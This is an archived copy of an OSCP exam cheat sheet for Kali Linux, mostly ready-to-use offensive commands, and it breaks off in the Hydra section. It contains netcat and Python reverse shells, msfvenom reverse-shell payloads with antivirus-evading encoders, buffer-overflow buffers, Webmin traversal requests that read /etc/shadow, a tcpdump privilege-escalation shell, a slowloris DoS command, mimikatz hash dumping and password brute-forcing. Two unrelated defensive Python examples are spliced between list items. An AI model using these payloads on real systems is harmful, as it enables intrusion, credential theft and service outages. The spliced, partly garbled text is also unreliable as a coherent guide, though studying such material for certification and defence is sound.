This is an old revision of the document!
Note: This page is a copy/paste of this resource: https://pastebin.com/kEh1x20f. The original author appears to be Austin Scott, and the purpose of this page is to preserve that document.
# OSCP-Survival-Guide
Kali Linux Offensive Security Certified Professional Playbook
NOTE: This document refers to the target IP as the exported variable $ip.
To set this value on the command line use the following syntax:
export ip=192.168.1.100
*UPDATE: October 2, 2017* Thanks for all the Stars! Wrote my OSCP exam last night, did not pass sadly … but I recorded a stop motion video of my failed attempt. TRY HARDER!
https://www.youtube.com/watch?v=HBMZWl9zcsc
The good news is that I will be learning more and adding more content to this guide :D
## Table of Contents
- [Kali Linux](#kali-linux)
- [Information Gathering & Vulnerability Scanning](#information-gathering--vulnerability-scanning)
- [Buffer Overflows and Exploits](#buffer-overflows-and-exploits)
- [Shells](#shells)
- [File Transfers](#file-transfers)
- [Privilege Escalation](#privilege-escalation)
- [Client, Web and Password Attacks](#client-web-and-password-attacks)
- [Networking, Pivoting and Tunneling](#networking-pivoting-and-tunneling)
- [The Metasploit Framework](#the-metasploit-framework)
- [Bypassing Antivirus Software](#bypassing-antivirus-software)
## Kali Linux
- Set the Target IP Address to the `$ip` system variable
`export ip=192.168.1.100`
- Find the location of a file
`locate sbd.exe`
- Search through directories in the `$PATH` environment variable
`which sbd`
- Find a file whose name contains a specific string:
`find / -name sbd\*`
- Show active internet connections
`netstat -lntp`
- Change Password
`passwd`
- Verify a service is running and listening
`netstat -antp |grep apache`
- Start a service
`systemctl start ssh `
`systemctl start apache2`
- Have a service start at boot
`systemctl enable ssh`
- Stop a service
`systemctl stop ssh`
- Unzip a gz file
`gunzip access.log.gz`
- Unzip a tar.gz file
`tar -xzvf file.tar.gz`
- Search command history
`history | grep phrase_to_search_for`
- Download a webpage
`wget http://www.cisco.com`
- Open a webpage
`curl http://www.cisco.com`
- String manipulation
`wc index.html`
`head index.html`
`tail index.html`
`grep "href=" index.html`
`grep "href=" index.html | cut -d "/" -f 3 | grep "\." | cut -d '"' -f 1 | sort -u`
`cat index.html | grep -o 'http:[^"]*' | cut -d "/" -f 3 | sort -u > list.txt`
- Use a bash loop to find the IP address behind each host
`for url in $(cat list.txt); do host $url; done`
- Collect all the IP addresses from a log file and sort by frequency
`cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn`
- Decoding using Kali
- Decode Base64 encoded values
`echo -n "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" | base64 --decode`
- Decode hexadecimal encoded values
`echo -n "46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874" | xxd -r -ps`
- Netcat - Read and write TCP and UDP packets
- Download Netcat for Windows (handy for creating reverse shells and transferring files on Windows systems): [https://joncraton.org/blog/46/netcat-for-windows/](https://joncraton.org/blog/46/netcat-for-windows/)
- Connect to a POP3 mail server
`nc -nv $ip 110`
- Listen on a TCP/UDP port
`nc -nlvp 4444`
- Connect to a netcat port
`nc -nv $ip 4444`
- Send a file using netcat
`nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe`
- Receive a file using netcat
`nc -nlvp 4444 > incoming.exe`
- Some OSs (OpenBSD) will use nc.traditional rather than nc, so watch out for that:
`whereis nc`
`nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz`
`/bin/nc.traditional -e /bin/bash 1.2.3.4 4444`
- Create a reverse shell with Ncat using cmd.exe on Windows
`nc.exe -nlvp 4444 -e cmd.exe` or `nc.exe -nv <Remote IP> <Remote Port> -e cmd.exe`
- Create a reverse shell with Ncat using bash on Linux
`nc -nv $ip 4444 -e /bin/bash`
- Netcat for banner grabbing:
`echo "" | nc -nv -w1 <IP Address> <Ports>`
- Ncat - Netcat from the Nmap project, which adds security features (such as SSL) that help avoid IDS
- Reverse shell from Windows using cmd.exe over SSL
`ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl`
- Connect to the listener on port 4444 using SSL
`ncat -v $ip 4444 --ssl`
- Wireshark
- Show only SMTP (port 25) and ICMP traffic:
`tcp.port eq 25 or icmp`
- Show only traffic in the LAN (192.168.x.x), between workstations and servers, no Internet:
`ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16`
- Filter by a protocol (e.g. SIP) and filter out unwanted IPs:
`ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip`
- Some filters are equivalent:
`ip.addr == xxx.xxx.xxx.xxx` equals `ip.src == xxx.xxx.xxx.xxx or ip.dst == xxx.xxx.xxx.xxx`
`ip.addr != xxx.xxx.xxx.xxx` equals `ip.src != xxx.xxx.xxx.xxx or ip.dst != xxx.xxx.xxx.xxx` (so it does not exclude a host; use `!(ip.addr == xxx.xxx.xxx.xxx)` for that)
- Tcpdump
- Display a pcap file
`tcpdump -r passwordz.pcap`
- Display IPs, filter and sort
`tcpdump -n -r passwordz.pcap | awk -F" " '{print $3}' | sort -u | head`
- Grab a packet capture on port 80
`tcpdump tcp port 80 -w output.pcap -i eth0`
- Check for the ACK and PSH flags set in a TCP packet (`tcp[13]` is the flags byte; 24 = PSH 8 + ACK 16)
`tcpdump -A -n 'tcp[13] = 24' -r passwordz.pcap`
- IPTables
- Deny traffic to ports except for local loopback
`iptables -A INPUT -p tcp --destination-port 13327 ! -d $ip -j DROP`
`iptables -A INPUT -p tcp --destination-port 9991 ! -d $ip -j DROP`
- Clear ALL IPTables firewall rules
```
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
iptables -t nat -F
iptables -t mangle -F
iptables -F
iptables -X
iptables -t raw -F
iptables -t raw -X
```

## Information Gathering & Vulnerability Scanning

### Passive Information Gathering
- Google Hacking
- Google search to find website sub domains
`site:microsoft.com`
- Google filetype, and intitle
`intitle:"netbotz appliance" "OK" -filetype:pdf`
- Google inurl
`inurl:"level/15/sexec/-/show"`
- Google Hacking Database: https://www.exploit-db.com/google-hacking-database/
- SSL Certificate Testing [https://www.ssllabs.com/ssltest/analyze.html](https://www.ssllabs.com/ssltest/analyze.html)
- Email Harvesting
- Simply Email
`git clone https://github.com/killswitch-GUI/SimplyEmail.git`
`./SimplyEmail.py -all -e TARGET-DOMAIN`
- Netcraft - Determine the operating system and tools used to build a site https://searchdns.netcraft.com/
- Whois Enumeration
`whois domain-name-here.com`
`whois $ip`
- Banner Grabbing
`nc -v $ip 25`
`telnet $ip 25`
`nc TARGET-IP 80`
- Recon-ng - full-featured web reconnaissance framework written in Python
`cd /opt; git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git`
`cd /opt/recon-ng`
`./recon-ng`
`show modules`
`help`

### Active Information Gathering

#### Port Scanning
*Subnet Reference Table*

| / | Addresses | Hosts | Netmask | Amount of a Class C |
| --- | --- | --- | --- | --- |
| /30 | 4 | 2 | 255.255.255.252 | 1/64 |
| /29 | 8 | 6 | 255.255.255.248 | 1/32 |
| /28 | 16 | 14 | 255.255.255.240 | 1/16 |
| /27 | 32 | 30 | 255.255.255.224 | 1/8 |
| /26 | 64 | 62 | 255.255.255.192 | 1/4 |
| /25 | 128 | 126 | 255.255.255.128 | 1/2 |
| /24 | 256 | 254 | 255.255.255.0 | 1 |
| /23 | 512 | 510 | 255.255.254.0 | 2 |
| /22 | 1024 | 1022 | 255.255.252.0 | 4 |
| /21 | 2048 | 2046 | 255.255.248.0 | 8 |
| /20 | 4096 | 4094 | 255.255.240.0 | 16 |
| /19 | 8192 | 8190 | 255.255.224.0 | 32 |
| /18 | 16384 | 16382 | 255.255.192.0 | 64 |
| /17 | 32768 | 32766 | 255.255.128.0 | 128 |
| /16 | 65536 | 65534 | 255.255.0.0 | 256 |

- Set the IP address as a variable
`export ip=192.168.1.100`
`nmap -A -T4 -p- $ip`
- Netcat port scanning
`nc -nvv -w 1 -z $ip 3388-3390`
- Discover active IPs using ARP on the network:
`arp-scan $ip/24`
- Discover who else is on the network
`netdiscover`
- Discover IP, MAC and MAC vendors from ARP
`netdiscover -r $ip/24`
- Nmap stealth scan using SYN
`nmap -sS $ip`
- Nmap stealth scan using FIN
`nmap -sF $ip`
- Nmap banner grabbing
`nmap -sV -sT $ip`
- Nmap OS fingerprinting
`nmap -O $ip`
- Nmap regular scan:
`nmap $ip/24`
- Enumeration scan
`nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt`
- Enumeration scan of all ports, TCP / UDP, with output to a txt file
`nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip`
- Nmap output to a file:
`nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24`
- Quick scan:
`nmap -T4 -F $ip/24`
- Quick scan plus:
`nmap -sV -T4 -O -F --version-light $ip/24`
- Quick traceroute
`nmap -sn --traceroute $ip`
- All TCP and UDP ports
`nmap -v -sU -sS -p- -A -T4 $ip`
- Intense scan:
`nmap -T4 -A -v $ip`
- Intense scan plus UDP
`nmap -sS -sU -T4 -A -v $ip/24`
- Intense scan, ALL TCP ports
`nmap -p 1-65535 -T4 -A -v $ip/24`
- Intense scan, no ping
`nmap -T4 -A -v -Pn $ip/24`
- Ping scan
`nmap -sn $ip/24`
- Slow comprehensive scan
`nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24`
- Scan with active connect in order to weed out any spoofed ports designed to troll you
`nmap -p1-65535 -A -T5 -sT $ip`

#### Enumeration
- DNS Enumeration
- Nmap DNS hostname lookup
`nmap -F --dns-server <dns server ip> <target ip range>`
- Host lookup
`host -t ns megacorpone.com`
- Reverse lookup brute force - find domains in the same range
`for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"`
- Perform DNS IP lookup
`dig a domain-name-here.com @nameserver`
- Perform MX record lookup
`dig mx domain-name-here.com @nameserver`
- Perform zone transfer with dig
`dig axfr domain-name-here.com @nameserver`
- DNS zone transfers
Windows DNS zone transfer: `nslookup` → `set type=any` → `ls -d blah.com`
Linux DNS zone transfer: `dig axfr blah.com @ns1.blah.com`
- Dnsrecon DNS brute force
`dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml`
- Dnsrecon DNS list of megacorp
`dnsrecon -d megacorpone.com -t axfr`
- DNSEnum
`dnsenum zonetransfer.me`
- Nmap enumeration script list:
- Nmap discovery [*https://nmap.org/nsedoc/categories/discovery.html*](https://nmap.org/nsedoc/categories/discovery.html)
- Nmap port version detection, MAXIMUM power
`nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p <port> <host>`
- NFS (Network File System) Enumeration
- Show mountable NFS shares
`nmap -sV --script=nfs-showmount $ip`
- RPC (Remote Procedure Call) Enumeration
- Connect to an RPC share without a username and password and enumerate privileges
`rpcclient --user="" --command=enumprivs -N $ip`
- Connect to an RPC share with a username and enumerate privileges
`rpcclient --user="<Username>" --command=enumprivs $ip`
- SMB Enumeration
- SMB OS discovery
`nmap $ip --script smb-os-discovery.nse`
- Nmap port scan
`nmap -v -p 139,445 -oG smb.txt $ip-254`
- NetBIOS information scanning
`nbtscan -r $ip/24`
- Nmap find exposed NetBIOS servers
`nmap -sU --script nbstat.nse -p 137 $ip`
- Nmap all SMB scripts scan
`nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip`
- Nmap all SMB scripts authenticated scan
`nmap -sV -Pn -vv -p 445 --script-args smbuser=<username>,smbpass=<password> --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip`
- SMB enumeration tools
`nmblookup -A $ip`
`smbclient //MOUNT/share -I $ip -N`
`rpcclient -U "" $ip`
`enum4linux $ip`
`enum4linux -a $ip`
`smbclient -L $ip`
- Nmap scan for open SMB shares
`nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.10.0/24`
- Nmap scans for vulnerable SMB servers
`nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip`
- Nmap list all SMB scripts installed
`ls -l /usr/share/nmap/scripts/smb*`
- Enumerate SMB users
`nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14` OR `python /usr/share/doc/python-impacket-doc/examples/samrdump.py $ip`
- RID cycling - null sessions
`ridenum.py $ip 500 50000 dict.txt`
- Manual null session testing
Windows: `net use \\$ip\IPC$ "" /u:""`
Linux: `smbclient -L $ip`
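The tcpdump filter `tcp[13] = 24` in the Tcpdump section above tests the TCP flags byte. The following is an added example (not part of the original guide) that decodes that byte from a raw header, shows why 24 means PSH+ACK, and contrasts the exact-match filter with the `tcp[13] & 24 = 24` form that also catches packets carrying extra flags such as ECE; the headers it parses are constructed inline.

```python
# Added example (not from the original guide): decode the TCP flags byte that the
# tcpdump filter 'tcp[13] = 24' tests, and build both filter forms for a flag set.
import struct

# Bit values of the TCP flags byte (offset 13 in the TCP header).
TCP_FLAGS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08,
             "ACK": 0x10, "URG": 0x20, "ECE": 0x40, "CWR": 0x80}


def flags_value(*names):
    """Numeric value of a flag combination, e.g. ('PSH', 'ACK') -> 24."""
    return sum(TCP_FLAGS[n] for n in names)


def flags_from_header(tcp_header):
    """Names of the flags set in a raw TCP header (needs at least 14 bytes)."""
    if len(tcp_header) < 14:
        raise ValueError("TCP header too short")
    byte = tcp_header[13]
    return {n for n, bit in TCP_FLAGS.items() if byte & bit}


def bpf_exact(*names):
    """Filter that matches only packets whose flags byte is exactly this set."""
    return "tcp[13] = %d" % flags_value(*names)


def bpf_includes(*names):
    """Filter that matches packets with at least these flags (others may be set too)."""
    v = flags_value(*names)
    return "tcp[13] & %d = %d" % (v, v)


def matches(tcp_header, *names, exact=False):
    """Evaluate either filter form against a raw header, as the BPF engine would."""
    byte = tcp_header[13]
    v = flags_value(*names)
    return byte == v if exact else (byte & v) == v


def build_tcp_header(flags):
    """Constructed 20-byte TCP header with the given flags byte (sample input only)."""
    data_offset = 5 << 4          # 5 x 32-bit words, no options
    return struct.pack("!HHIIBBHHH", 34567, 80, 1000, 2000,
                       data_offset, flags, 65535, 0, 0)


# Constructed sample headers: PSH+ACK (what 24 means) and PSH+ACK+ECE.
PSH_ACK_HEADER = build_tcp_header(flags_value("PSH", "ACK"))
PSH_ACK_ECE_HEADER = build_tcp_header(flags_value("PSH", "ACK", "ECE"))

if __name__ == "__main__":
    print(sorted(flags_from_header(PSH_ACK_HEADER)), bpf_exact("PSH", "ACK"))
    # The exact filter misses the ECE-marked packet; the masked form catches it.
    print(bpf_includes("PSH", "ACK"),
          matches(PSH_ACK_ECE_HEADER, "PSH", "ACK", exact=True),
          matches(PSH_ACK_ECE_HEADER, "PSH", "ACK"))
```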
- SMTP Enumeration - Mail Servers
`nc -nv $ip 25`
- POP3 Enumeration - Reading other people's mail - You may find usernames and passwords for email accounts, so here is how to check the mail using Telnet
```
root@kali:~# telnet $ip 110
+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
USER billydean
+OK
PASS password
+OK Welcome billydean
list
+OK 2 1807
1 786
2 1021
retr 1
+OK Message follows
From: jamesbrown@motown.com
Dear Billy Dean,

Here is your login for remote desktop ... try not to forget it this time!
username: billydean
password: PA$$W0RD!Z
```
- SNMP Enumeration - Simple Network Management Protocol
`apt-get install snmp-mibs-downloader`
`download-mibs`
`echo "" > /etc/snmp/snmp.conf`
`nmap -sV -p 161 --script=snmp-info $ip/24`
`apt-get install snmp snmp-mibs-downloader`
`wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb`
`/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt`
- MS SQL Server Enumeration
`nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip`
- Webmin and miniserv/0.01 Enumeration - Port 10000
Test for LFI & file disclosure vulnerability by grabbing /etc/passwd
`curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd`
Test to see if webmin is running as root by grabbing /etc/shadow
`curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow`
- Linux OS Enumeration
`find / -perm -4000 2>/dev/null`
`cat /etc/issue`
`uname -a`
`ps -xaf`
`sudo -l`
`iptables --table nat --list`
`iptables -vL -t filter`
`iptables -vL -t nat`
`iptables -vL -t mangle`
`iptables -vL -t raw`
`iptables -vL -t security`
- Windows OS Enumeration
- Vulnerability Scanning with Nmap
- Nmap Exploit Scripts
[*https://nmap.org/nsedoc/categories/exploit.html*](https://nmap.org/nsedoc/categories/exploit.html)
- Nmap search through vulnerability scripts
`cd /usr/share/nmap/scripts/; ls -l *vuln*`
- Nmap search through Nmap Scripts for a specific keyword
`ls /usr/share/nmap/scripts/* | grep ftp`
- Scan for vulnerable exploits with nmap
`nmap --script exploit -Pn $ip`
- NMap Auth Scripts
[*https://nmap.org/nsedoc/categories/auth.html*](https://nmap.org/nsedoc/categories/auth.html)
- Nmap Vuln Scanning
[*https://nmap.org/nsedoc/categories/vuln.html*](https://nmap.org/nsedoc/categories/vuln.html)
- NMap DOS Scanning
`nmap --script dos -Pn $ip`
- NMap Execute DOS Attack
`nmap --max-parallelism 750 -Pn --script http-slowloris --script-args http-slowloris.runforever=true`
- Scan for coldfusion web vulnerabilities
`nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip`
- Anonymous FTP dump with Nmap
`nmap -v -p 21 --script=ftp-anon.nse $ip-254`
- SMB Security mode scan with Nmap
`nmap -v -p 445 --script=smb-security-mode.nse $ip-254`
- File Enumeration
`wget https://highon.coffee/downloads/linux-local-enum.sh`
`chmod +x ./linux-local-enum.sh`
`./linux-local-enum.sh`
`find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug`
`find / -name 'suid*'`
`strings <filename>`
`file <filename>`
- HTTP Enumeration
`gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip`
`dirb http://$ip/ wordlist.dict`
`dirb http://vm/`
Dirb against a proxy - `dirb http://$ip/ -p $ip:3129`
`nikto -h $ip`
`nmap --script=http-enum -p80 -n $ip/24`
`nmap --script http-methods --script-args http-methods.url-path='/test' $ip`
`curl -vX OPTIONS vm/test`
`uniscan -qweds -u http://vm/`
`wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test `
`wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ `
`wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"`
`wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ`
Recurse level 3
`wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ`
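The access-log one-liner in the Kali Linux section (`cut -d " " -f 1 | sort | uniq -c | sort -urn`) and the dirb/wfuzz/nikto runs above meet on the defender's side in the web server log. This added example (not from the original guide) parses constructed Apache combined-format lines, ranks source IPs by request count and flags sources with a run of 403/404 responses, which is what a wordlist-driven directory scan looks like from the server.

```python
# Added example (not from the original guide): the defender's view of a directory
# brute-force run. Parses Apache combined-format access log lines, counts requests
# per source IP and flags sources with many 403/404 responses. Log lines below are
# constructed samples, not real traffic.
import re
from collections import Counter

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """One combined-log line -> dict, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def parse_log(text):
    """All parseable entries of a log text; unparseable lines are skipped."""
    return [e for e in (parse_line(l) for l in text.splitlines()) if e]


def ips_by_frequency(entries):
    """[(ip, count), ...] most frequent first, like 'sort | uniq -c | sort -urn'."""
    return Counter(e["ip"] for e in entries).most_common()


def suspected_scanners(entries, min_misses=3):
    """Source IPs with at least min_misses 403/404 responses: probable dirb/wfuzz."""
    misses = Counter(e["ip"] for e in entries if e["status"] in (403, 404))
    return sorted(ip for ip, n in misses.items() if n >= min_misses)


def missed_paths(entries, ip):
    """Paths a given source probed unsuccessfully, in log order."""
    return [e["path"] for e in entries if e["ip"] == ip and e["status"] in (403, 404)]


# Constructed sample log: one normal visitor, one scanner, one POST, one junk line.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Oct/2017:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [02/Oct/2017:10:01:03 +0000] "GET /admin HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Nikto/2.1.6)"
10.0.0.9 - - [02/Oct/2017:10:01:03 +0000] "GET /backup HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Nikto/2.1.6)"
10.0.0.9 - - [02/Oct/2017:10:01:04 +0000] "GET /cgi-bin/ HTTP/1.1" 403 301 "-" "Mozilla/5.0 (Nikto/2.1.6)"
10.0.0.9 - - [02/Oct/2017:10:01:04 +0000] "GET /test HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Nikto/2.1.6)"
10.0.0.5 - - [02/Oct/2017:10:01:09 +0000] "GET /about.html HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.0.0.7 - - [02/Oct/2017:10:02:00 +0000] "POST /wp-login.php HTTP/1.1" 200 1802 "-" "curl/7.55"
this line is not a log entry and is skipped
"""

if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    print(ips_by_frequency(entries))
    for ip in suspected_scanners(entries):
        print(ip, missed_paths(entries, ip))
```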
- Open a service using a port knock (Secured with Knockd)
`for x in 7000 8000 9000; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x server_ip_address; done`
- WordPress Scan - Wordpress security scanner
- RSH Enumeration - Unencrypted file transfer system
- Finger Enumeration
- TLS & SSL Testing
OUTPUT-FILE.html
- Proxy Enumeration (useful for open proxies)
## Buffer Overflows and Exploits
- DEP and ASLR - Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR)
- Nmap Fuzzers:
[https://nmap.org/nsedoc/categories/fuzzer.html](https://nmap.org/nsedoc/categories/fuzzer.html)
`nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip`
`nmap --script dns-fuzz --script-args timelimit=2h $ip -d`
- MSFvenom
[*https://www.offensive-security.com/metasploit-unleashed/msfvenom/*](https://www.offensive-security.com/metasploit-unleashed/msfvenom/)
- Windows Buffer Overflows
`locate pattern_create`
`pattern_create.rb -l 2700`
`locate pattern_offset`
`pattern_offset.rb -q 39694438`
`buffer = "A" * 2606 + "B" * 4 + "C" * 90`
`/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb`
`JMP ESP` → `00000000 FFE4 jmp esp`
`!mona find -s "\xff\xe4" -m slmfc.dll` found at 0x5f4a358f - Flip around for little endian format
`buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390`
`msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"`
`buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode`
`msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -o shell_reverse.exe`
Shikata_ga_nai
`msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe`
executable
`msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe`
`msfvenom -p windows/meterpreter/reverse_https LHOST=$ip LPORT=443 -f exe -o met_https_reverse.exe`
- Linux Buffer Overflows
`edb --run /usr/games/crossfire/bin/crossfire`
`add eax,12`
`jmp eax`
`83C00C add eax,byte +0xc`
`FFE0 jmp eax`
`times 0x00 - 0xFF`
`"\x97\x45\x13\x08" # Found at Address 08134597`
`"\x83\xc0\x0c\xff\xe0\x90\x90"`
`"\x00\x0a\x0d\x20" -e x86/shikata_ga_nai`
`nc -v $ip 4444`
## Shells
- Netcat Shell Listener
`nc -nlvp 4444`
- Spawning a TTY Shell - Break out of Jail or limited shell
You should almost always upgrade your shell after taking control of an apache or www user.
(For example when you encounter an error message when trying to run an exploit: `sh: no job control in this shell`)
(hint: `sudo -l` to see what you can run)
You can overcome this by executing an SSH shell to your localhost:
`ssh user@$ip nc $localip 4444 -e /bin/sh` (enter the user's password)
`python -c 'import pty; pty.spawn("/bin/sh")'`
`export TERM=linux`
`python -c 'import pty; pty.spawn("/bin/sh")'`
`python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`
`echo os.system('/bin/bash')`
`/bin/sh -i`
`perl -e 'exec "/bin/sh";'`
perl: `exec "/bin/sh";`
ruby: `exec "/bin/sh"`
lua: `os.execute('/bin/sh')`
From within IRB: `exec "/bin/sh"`
From within vi: `:!bash` or `:set shell=/bin/bash:shell`
From within vim: `:!bash`
From within nmap: `!sh`
From within tcpdump:
`echo $'id\n/bin/netcat $ip 443 -e /bin/bash' > /tmp/.test`
`chmod +x /tmp/.test`
`sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root`
From busybox: `/bin/busybox telnetd -l /bin/sh -p9999`
- Pen test monkey PHP reverse shell
[http://pentestmonkey.net/tools/web-shells/php-reverse-shell](http://pentestmonkey.net/tools/web-shells/php-reverse-shell)
- php-findsock-shell - turns PHP port 80 into an interactive shell
[http://pentestmonkey.net/tools/web-shells/php-findsock-shell](http://pentestmonkey.net/tools/web-shells/php-findsock-shell)
- Perl Reverse Shell
[http://pentestmonkey.net/tools/web-shells/perl-reverse-shell](http://pentestmonkey.net/tools/web-shells/perl-reverse-shell)
- PHP powered web browser Shell b374k with file upload etc.
[https://github.com/b374k/b374k](https://github.com/b374k/b374k)
- Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell
https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
- Web Backdoors from Fuzzdb
https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors
- Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/
`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf`
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe`
`msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho`
You may encounter NoSQL instances like MongoDB in your OSCP journeys (`/cgi-bin/mongo/2.2.3/dbparse.py`). NoSQLMap can help you automate NoSQL database enumeration.
```
git clone https://github.com/codingo/NoSQLMap.git
cd NoSQLMap/
ls
pip install couchdb
pip install pbkdf2
pip install ipcalc
python nosqlmap.py --help
```
## Client, Web and Password Attacks
- Password Attacks
`for x in 'index' 'about' 'post' 'contact' ; do curl http://$ip/$x.html | html2markdown | tr -s ' ' '\n' >> webapp.txt ; done`
`html2dic index.html.out | sort -u > index-html.dict`
[*http://www.cirt.net/passwords*](http://www.cirt.net/passwords)
Networked Devices
[*http://www.virus.org/default-password/*](http://www.virus.org/default-password/)
[*http://www.defaultpassword.com/*](http://www.defaultpassword.com/)
[*https://nmap.org/nsedoc/categories/brute.html*](https://nmap.org/nsedoc/categories/brute.html)
`nmap --script brute -Pn <target.com or ip>`
`nmap --script=mysql-brute $ip`
`cd /usr/share/wordlists`
attempting to dump the password hashes and cached credentials.
passwords and hashes
tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets
[*https://github.com/gentilkiwi/mimikatz*](https://github.com/gentilkiwi/mimikatz)
From metasploit meterpreter (must have System level access):
```
meterpreter> load mimikatz
meterpreter> help mimikatz
meterpreter> msv
meterpreter> kerberos
meterpreter> mimikatz_command -f samdump::hashes
meterpreter> mimikatz_command -f sekurlsa::searchPasswords
```
`cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt`
`nano /etc/john/john.conf`
`john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt`
directory
`medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10`
`ncrack -vv --user offsec -P password-file.txt rdp:$ip`
- Hydra
- Hydra brute force against SNMP
`hydra -P password-file.txt -v $ip snmp`
- Hydra FTP with known user and password list
